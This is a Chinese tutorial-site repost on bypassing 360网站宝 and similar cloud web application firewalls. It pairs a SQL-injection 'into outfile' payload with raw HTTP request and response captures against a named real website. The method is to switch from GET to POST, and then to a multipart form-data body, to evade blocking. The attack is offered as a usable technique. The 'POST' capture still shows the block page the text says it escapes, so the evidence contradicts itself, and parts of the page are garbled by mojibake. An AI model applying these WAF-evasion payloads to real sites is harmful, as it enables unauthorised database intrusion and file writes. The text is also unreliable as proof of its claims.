网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

360网站宝/安全宝/加速乐及其他类似产品防护绕过

来源:自学PHP网    时间:2015-04-15 14:59 作者: 阅读:

[导读] 360网站宝等云waf产品在实现的时候存在问题可以导致安全策略绕过在对GET请求处理的时候都能够识别攻击,但是一旦换成了POST请求或者是改造过的POST就不存在此问题了GET index php?id=1%2...

360网站宝等云waf产品在实现的时候存在问题可以导致安全策略绕过
 
在对GET请求处理的时候都能够识别攻击,但是一旦换成了POST请求或者是改造过的POST就不存在此问题了
 
GET /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1

Host: www.xiangshu.com

Connection: keep-alive

Content-Length: 1778



HTTP/1.1 493

Server: nginx/1.2.9

Date: Thu, 28 Nov 2013 12:21:35 GMT

Content-Type: text/html

Content-Length: 5538

Connection: keep-alive

X-Powered-By-360WZB: wangzhan.360.cn



<!DOCTYPE html>

<html>

<head> 

<title>禁止访问</title>

<meta charset="utf-8" />

<meta name="author" content="" />

<meta name="keywords" content="" />

<meta name="description" content="" />

<style>

body{margin:0; padding:0;text-align: center;font-family:"微软雅黑" Arial, Helvetica, sans-serif;font-size: 14px;color: #666;}

div,dl,dd,dt,ul,li,p,h1,h2{margin:0; padding:0;}

h1{font-size:22px;  line-height:30px; text-align:left; line-height:40px; margin-bottom:10px; color:#666;}

.wrap{width:715px; margin:50px auto;}

.waring-tips1,.waring-tips2{height:55px; line-height:55px; border-radius:10px; font-size:20px; color:#fff; }

.waring-tips1{background:#F8AE01 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}

.waring-tips2{background:#0D5598 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}

.waring-tips1 p,.waring-tips2 p{padding-left:50px; line-height:55px; background:url(/wzws-waf-cgi/wz-warning-icon2.png) no-repeat 15px center;}

.main{border:1px solid #D0D0D0; border-radius:10px;}

.warning-domain{padding:10px 20px;}

.warning-domain dt{color:#000; text-align:left;font-size:20px; font-weight:bold; line-height:30px;}

.warning-domain dd{color:#333; text-align:left; font-size:16px; line-height:35px;}

.warning-conlist{border-top:1px solid #d0d0d0; padding-top:10px; padding-bottom:10px;}

.warning-conlist dl{position:relative;}

.warning-conlist dl dt{width:190px; position:absolute; text-align:center;font-size:16px; font-weight:bold; color:#555; left:0; top:0; line-height:45px; text-align:left; text-indent:50px;}

.warning-conlist dl dd{margin-left:190px; line-height:45px; text-align:left;}

.warning-conlist p{clear:both; font-size:12px; text-align:left; line-height:30px; padding:5px 10px;}

</style>

</head>

<body>

<div class="wrap">

<h1 class="waring-tips1"><p>禁止访问</p></h1>

<div class="main">

<dl class="warning-domain">

<dt id="host"></dt>

<dd>您提交的请求存在危险内容,已被网站卫士拦截!</dd>

</dl>

<div class="warning-conlist">

<dl>

<dt>拦截网址:</dt>

<dd id="wurl">&nbsp;</dd>

</dl>

<dl>

<dt>拦截时间:</dt>

<dd id="wdate">2013-03-28 16:19:25</dd>

</dl>

<dl style="margin-bottom:10px; border-bottom:1px solid #ccc">

<dt>处理结果:</dt>

<dd>IP已被记录并提交至网络监察部门备案!</dd>

</dl>

            <p>如果您是站长,要继续访问网址,请进入<a href="javascript:void(0);" onclick="tongdao()" style="color:green">[站长绿色通道]</a></p>

<p >(站长绿色通道:网站卫士会自动将当前被拦截的URLåŠ å…¥é˜²ç«å¢™ç™½åå•ï¼Œåœ¨3小时之内该URL不进行安全检测)</p>

</div>

</div>

</div>

<script type="text/javascript" src="/wzws-waf-cgi/jquery-1.4.2.min.js"></script>

<script type="text/javascript">



function Base64() {



// private property

_keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";



// public method for encoding

this.encode = function (input) {

var output = "";

var chr1, chr2, chr3, enc1, enc2, enc3, enc4;

var i = 0;

input = _utf8_encode(input);

while (i < input.length) {

chr1 = input.charCodeAt(i++);

chr2 = input.charCodeAt(i++);

chr3 = input.charCodeAt(i++);

enc1 = chr1 >> 2;

enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);

enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);

enc4 = chr3 & 63;

if (isNaN(chr2)) {

enc3 = enc4 = 64;

} else if (isNaN(chr3)) {

enc4 = 64;

}

output = output +

_keyStr.charAt(enc1) + _keyStr.charAt(enc2) +

_keyStr.charAt(enc3) + _keyStr.charAt(enc4);

}

return output;

}



// private method for UTF-8 encoding

_utf8_encode = function (string) {

string = string.replace(/\r\n/g,"\n");

var utftext = "";

for (var n = 0; n < string.length; n++) {

var c = string.charCodeAt(n);

if (c < 128) {

utftext += String.fromCharCode(c);

} else if((c > 127) && (c < 2048)) {

utftext += String.fromCharCode((c >> 6) | 192);

utftext += String.fromCharCode((c & 63) | 128);

} else {

utftext += String.fromCharCode((c >> 12) | 224);

utftext += String.fromCharCode(((c >> 6) & 63) | 128);

utftext += String.fromCharCode((c & 63) | 128);

}



}

return utftext;

}



}





function HTMLEncode(html) 

{

var temp = document.createElement ("div"); 

(temp.textContent != null) ? (temp.textContent = html) : (temp.innerText = html); 

var output = temp.innerHTML; 

temp = null; 

return output; 

} 

$(document).ready(function(){

  $("#host").text(location.hostname);

  $("#wurl").text(HTMLEncode(location.href));

  var myDate = new Date();

  $("#wdate").text(myDate.toLocaleString());

});



function wubao(){

var host = location.hostname;

location.href="fankui.html?"+host;

}



function tongdao(){

var host = location.hostname;

var url = HTMLEncode(location.href);

var index = url.indexOf("?");

if(index>0){

url = url.substr(0,index);

}

var b = new Base64();  

url = b.encode(url); 

location.href="http://wangzhan.360.cn/index/shouquan/host/"+host+"/?url="+url;

}



</script>

<script type="text/javascript">



  var _gaq = _gaq || [];

  _gaq.push(['_setAccount', 'UA-32745158-2']);

  _gaq.push(['_trackPageview']);



  (function() {

    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;

    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);

  })();



</script>

</body>

</html>


 

 
 
 
 
 
 
换成
 
 
 
POST /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1

Host: www.xiangshu.com

Connection: keep-alive

Content-Length: 1778



HTTP/1.1 493

Server: nginx/1.2.9

Date: Thu, 28 Nov 2013 12:22:04 GMT

Content-Type: text/html

Content-Length: 5538

Connection: keep-alive

X-Powered-By-360WZB: wangzhan.360.cn



<!DOCTYPE html>

<html>

<head> 

<title>禁止访问</title>

<meta charset="utf-8" />

<meta name="author" content="" />

<meta name="keywords" content="" />

<meta name="description" content="" />

<style>

body{margin:0; padding:0;text-align: center;font-family:"微软雅黑" Arial, Helvetica, sans-serif;font-size: 14px;color: #666;}

div,dl,dd,dt,ul,li,p,h1,h2{margin:0; padding:0;}

h1{font-size:22px;  line-height:30px; text-align:left; line-height:40px; margin-bottom:10px; color:#666;}

.wrap{width:715px; margin:50px auto;}

.waring-tips1,.waring-tips2{height:55px; line-height:55px; border-radius:10px; font-size:20px; color:#fff; }

.waring-tips1{background:#F8AE01 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}

.waring-tips2{background:#0D5598 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}

.waring-tips1 p,.waring-tips2 p{padding-left:50px; line-height:55px; background:url(/wzws-waf-cgi/wz-warning-icon2.png) no-repeat 15px center;}

.main{border:1px solid #D0D0D0; border-radius:10px;}

.warning-domain{padding:10px 20px;}

.warning-domain dt{color:#000; text-align:left;font-size:20px; font-weight:bold; line-height:30px;}

.warning-domain dd{color:#333; text-align:left; font-size:16px; line-height:35px;}

.warning-conlist{border-top:1px solid #d0d0d0; padding-top:10px; padding-bottom:10px;}

.warning-conlist dl{position:relative;}

.warning-conlist dl dt{width:190px; position:absolute; text-align:center;font-size:16px; font-weight:bold; color:#555; left:0; top:0; line-height:45px; text-align:left; text-indent:50px;}

.warning-conlist dl dd{margin-left:190px; line-height:45px; text-align:left;}

.warning-conlist p{clear:both; font-size:12px; text-align:left; line-height:30px; padding:5px 10px;}

</style>

</head>

<body>

<div class="wrap">

<h1 class="waring-tips1"><p>禁止访问</p></h1>

<div class="main">

<dl class="warning-domain">

<dt id="host"></dt>

<dd>您提交的请求存在危险内容,已被网站卫士拦截!</dd>

</dl>

<div class="warning-conlist">

<dl>

<dt>拦截网址:</dt>

<dd id="wurl">&nbsp;</dd>

</dl>

<dl>

<dt>拦截时间:</dt>

<dd id="wdate">2013-03-28 16:19:25</dd>

</dl>

<dl style="margin-bottom:10px; border-bottom:1px solid #ccc">

<dt>处理结果:</dt>

<dd>IP已被记录并提交至网络监察部门备案!</dd>

</dl>

            <p>如果您是站长,要继续访问网址,请进入<a href="javascript:void(0);" onclick="tongdao()" style="color:green">[站长绿色通道]</a></p>

<p >(站长绿色通道:网站卫士会自动将当前被拦截的URLåŠ å…¥é˜²ç«å¢™ç™½åå•ï¼Œåœ¨3小时之内该URL不进行安全检测)</p>

</div>

</div>

</div>

<script type="text/javascript" src="/wzws-waf-cgi/jquery-1.4.2.min.js"></script>

<script type="text/javascript">



function Base64() {



// private property

_keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";



// public method for encoding

this.encode = function (input) {

var output = "";

var chr1, chr2, chr3, enc1, enc2, enc3, enc4;

var i = 0;

input = _utf8_encode(input);

while (i < input.length) {

chr1 = input.charCodeAt(i++);

chr2 = input.charCodeAt(i++);

chr3 = input.charCodeAt(i++);

enc1 = chr1 >> 2;

enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);

enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);

enc4 = chr3 & 63;

if (isNaN(chr2)) {

enc3 = enc4 = 64;

} else if (isNaN(chr3)) {

enc4 = 64;

}

output = output +

_keyStr.charAt(enc1) + _keyStr.charAt(enc2) +

_keyStr.charAt(enc3) + _keyStr.charAt(enc4);

}

return output;

}



// private method for UTF-8 encoding

_utf8_encode = function (string) {

string = string.replace(/\r\n/g,"\n");

var utftext = "";

for (var n = 0; n < string.length; n++) {

var c = string.charCodeAt(n);

if (c < 128) {

utftext += String.fromCharCode(c);

} else if((c > 127) && (c < 2048)) {

utftext += String.fromCharCode((c >> 6) | 192);

utftext += String.fromCharCode((c & 63) | 128);

} else {

utftext += String.fromCharCode((c >> 12) | 224);

utftext += String.fromCharCode(((c >> 6) & 63) | 128);

utftext += String.fromCharCode((c & 63) | 128);

}



}

return utftext;

}



}





function HTMLEncode(html) 

{

var temp = document.createElement ("div"); 

(temp.textContent != null) ? (temp.textContent = html) : (temp.innerText = html); 

var output = temp.innerHTML; 

temp = null; 

return output; 

} 

$(document).ready(function(){

  $("#host").text(location.hostname);

  $("#wurl").text(HTMLEncode(location.href));

  var myDate = new Date();

  $("#wdate").text(myDate.toLocaleString());

});



function wubao(){

var host = location.hostname;

location.href="fankui.html?"+host;

}



function tongdao(){

var host = location.hostname;

var url = HTMLEncode(location.href);

var index = url.indexOf("?");

if(index>0){

url = url.substr(0,index);

}

var b = new Base64();  

url = b.encode(url); 

location.href="http://wangzhan.360.cn/index/shouquan/host/"+host+"/?url="+url;

}



</script>

<script type="text/javascript">



  var _gaq = _gaq || [];

  _gaq.push(['_setAccount', 'UA-32745158-2']);

  _gaq.push(['_trackPageview']);



  (function() {

    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;

    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);

  })();



</script>

</body>

</html>

 

 
 
 
即不拦
 
 
 
如果还拦就换成文件上传的方式
 
 
 
------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7

Content-Disposition: form-data; name="folder"



/blog/

------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7

Content-Disposition: form-data; name="id"



1%20into%20outfile%20'/tmp/abc'




HTTP/1.1 200 OK

Server: nginx/1.2.9

Date: Thu, 28 Nov 2013 12:22:23 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By-360WZB: wangzhan.360.cn

X-Powered-By: PHP/5.2.13

Content-Length: 6258



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<link rel="stylesheet" type="text/css" href="/css/main.css" />

<script type="text/javascript" src="/assets/b043222/jquery.js"></script>

<script type="text/javascript" src="/css/cycle.js"></script>

<title>æ©¡æ ‘æ‘„å½±ç½‘-ä¸­å›½æ©¡æ ‘æ‘„å½±çˆ±å¥½è€…ä¿±ä¹éƒ¨ www.xiangshu.com</title>

<meta name="Description" content="æ©¡æ ‘æ‘„å½±ç½‘ www.xiangshu.com 中国规模最大的摄影俱乐部" />

<link rel="shortcut icon" href="http://www.xiangshu.com/images/xiangshu.ico" />

</head>



<body>



<div id="wrap">

    <div id="header">

        <div id="logo">

            <div id="logopic"><a href=http://www.xiangshu.com/club/0><img src=http://www.2cto.com/uploadfile/2014/0113/20140113105359402.jpg border=0></a></div>

            <h1>中国规模最大的摄影俱乐部</h1> 

        </div>

       



<div id="club"><a href="/club/0">总站</a> <a style="font-size:12px;font-weight:normal;color:red" href="/site/club"> [换城市]</a>

</div>









        <div id="banner">

       



<div id="enter">



<a href=http://www.xiangshu.com/read.php?tid=1004568>网站热线电话:400-100-8885</a>   |    <a href=http://www.gxsyxy.com target="_blank">光线摄影学院</a>   |  <a href=http://www.xiangshu.com/club/0>总站首页入口</a>



</div>

    

  <div class="clear"></div>

            <div id="subnav">

                <ul>

                    <li style="background:#006600"><a href=http://www.xiangshu.com/joining.php>注册免费会员</a></li>

                    <li style="background:#99CC00"><a href=http://www.xiangshu.com/read.php?tid=1004568>申请VIP会员</a>

</li>

                    <li style="background:#FF9900"><a href=http://www.xiangshu.com/membercard.php>捆绑会员卡</a></li>

                    <li style="background:#666666"><a href=http://www.xiangshu.com/about/7>景点合作和案例</a>

</li>

                </ul>

            </div>

        </div>

    </div>



    <div id="nav">

        <div id="nav_l"></div>

        <div id="nav_bg">

            <ul>

                <li><a href=http://www.xiangshu.com/pic/1>人 文</a></li>

                <li>|</li>

                <li><a href=http://www.xiangshu.com/pic/2>风 光</a></li>

                <li>|</li>

                <li><a href=http://www.xiangshu.com/pic/3>美 女</a></li>

                <li>|</li>

                <li><a href=http://www.xiangshu.com/pic/4>创 意</a></li>

                <li>|</li>

                <li><a href=http://www.xiangshu.com/thread.php?fid=2>摄影社区</a></li>

<li>|</li>

                <li><a href=http://www.xiangshu.com/thread.php?fid=64>驴友专区</a></li>

                <li class="btn"><a href=http://www.xiangshu.com/site/club>更换城市分站</a></li>

            </ul>

        </div>

        <div id="nav_r"></div>

    </div>



    <div id="main">

    <div id="index_top"></div>

    <div id="index_bg">

        <div id="flash">

                        <a href="http://www.xiangshu.com/thread.php?fid=2"><img width="538" height="404" src=http://www.2cto.com/uploadfile/2014/0113/20140113105359874.jpg" alt="进入其他城市可看更多当地精华图片" /></a>                <a href="http://www.xiangshu.com/thread.php?fid=2"><img width="538" height="404" src=http://www.2cto.com/uploadfile/2014/0113/20140113105359659.jpg" alt="进入其他城市可看更多当地精华图片" /></a>                        </div>

        <div id="map">

            <div id="iframe"><iframe marginWidth="0" marginHeight="0" frameSpacing="0" src="http://www.xiangshu.com/map/" frameBorder="0" width="300" scrolling="no" height="242"></iframe></div>

            <div id="news">

                <div id="news_tit"><span class="left">总站公告</span><span class="right">从地图进俱乐部 [<a href=club.html>文字入口</a>] </span></div>

                <div id="news_list">

                    <ul>

                                                <li>

                            <dl>

                                <dt><a target="_blank" href="/article/view/id/62">çƒ­çƒˆåº†ç¥æ©¡æ ‘æ‘„å½±ç½‘åˆ›åŠž9周年[十月二十六]</a></dt>

                                <dd>[10-20]</dd>

                            </dl>

                        </li>

                                                <li>

                            <dl>

                                <dt><a target="_blank" href="/article/view/id/61">æ©¡æ ‘ç½‘ä»£è¡¨åº”é‚€å‡ºå¸­ä¸­å›½ç¥žå†œæž¶åšå®¢é‚€è¯·èµ›</a></dt>

                                <dd>[06-09]</dd>

                            </dl>

                        </li>

                                                <li>

                            <dl>

                                <dt><a target="_blank" href="/article/view/id/60">关于委托唐瑞先生赴景区洽谈合作的声明</a></dt>

                                <dd>[04-19]</dd>

                            </dl>

                        </li>

                                                <li>

                            <dl>

                                <dt><a target="_blank" href="/article/view/id/59">网站升级:图片质量上升到500K,开放外链</a></dt>

                                <dd>[03-06]</dd>

                            </dl>

                        </li>

                                                <li>

                            <dl>

                                <dt><a target="_blank" href="/article/view/id/58">æ©¡æ ‘ç½‘å‰¯æ€»è£å’Œæœ¨çŽ‹å›½å®¶æ£®æž—å…¬å›­ç­¾çº¦</a></dt>

                                <dd>[12-21]</dd>

                            </dl>

                        </li>

                                            </ul>

                </div>

            </div>

        </div>

    </div>

    <div id="index_bottom"></div>

</div>



    <div id="hezuo">

 <a href=http://www.xiangshu.com/about/6>å…³äºŽæ©¡æ ‘</a> - <a href=http://www.xiangshu.com/about/8>联系我们</a> - <a href=http://www.xiangshu.com/link>友情链接</a>  [粤ICP备11037153号]

</div> 

  



</body>

</html>

 

 
就不拦了......
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论